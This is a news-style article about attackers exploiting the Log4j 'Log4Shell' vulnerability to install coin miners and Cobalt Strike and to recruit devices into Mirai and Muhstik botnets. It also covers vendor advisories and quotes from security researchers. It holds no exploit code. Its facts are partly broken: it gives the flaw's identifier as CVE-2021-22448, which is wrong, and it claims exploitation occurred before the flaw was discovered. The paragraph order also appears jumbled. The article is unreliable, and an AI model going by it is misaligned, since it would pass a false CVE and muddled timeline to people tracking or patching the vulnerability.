Netlab, the networking security division of Chinese tech behemoth Qihoo 360, revealed that threats such as Mirai and Muhstik (aka Tsunami) are targeting vulnerable systems in order to spread the infection and increase computing power to (DDoS) attacks with the goal of overloading a target and rendering it unusable. Muhstik was previously caught exploiting a critical security flaw in Atlassian Confluence (CVE-2021-26084, CVSS score: 9.8) in September.
Threat actors are actively weaponizing unpatched Log4j servers affected by the newly discovered “Log4Shell” vulnerability to install cryptocurrency miners, Cobalt Strike and recruit the devices into a botnet, despite telemetry evidence pointing to exploitation of the flaw nine days before it was discovered.
VMware, a provider of virtualization technology, has also issued a warning about “exploitation attempts in the wild,” adding that it is releasing patches for a number of its products. Vendors are also scrambling to release bug fixes as a result of the situation. SonicWall, a network security vendor, revealed in an advisory that its Email Security solution is affected, stating that it is working to release a fix for the issue while continuing to investigate the rest of its product line.
The flaw, identified as CVE-2021-22448 (CVSS score: 10.0), is related to a case of remote code execution in Log4j, a Java-based open-source Apache logging framework widely used in enterprise environments applications to record events and messages generated by software applications.
According to an analysis by the Microsoft 365 Defender Threat Intelligence Team. “Depending on the nature of the vulnerability, once an attacker has full access and control of an application, they can accomplish a wide range of goals. The majority of attacks that Microsoft has observed at this time have been related to mass scanning by attackers attempting to thumbprint vulnerable systems, as well as scanning by security companies and researchers.”
To exploit the vulnerability, an adversary only needs to send a specially crafted string containing the malicious code, which is logged by Log4j version 2.0 or higher, effectively allowing the threat actor to load arbitrary code from an application.
Finally Huntress Labs Senior Security Researcher John Hammond concluded that , “There is no immediate target for this vulnerability — hackers are wreaking havoc in a spray-and-pray fashion.” In fact, cases like these demonstrate how a single flaw, when discovered in packages included in a large number of software can have far-reaching consequences, acting as a conduit for additional attacks and posing a critical risk to affected systems. “All threat actors need is one line of text to launch an attack.”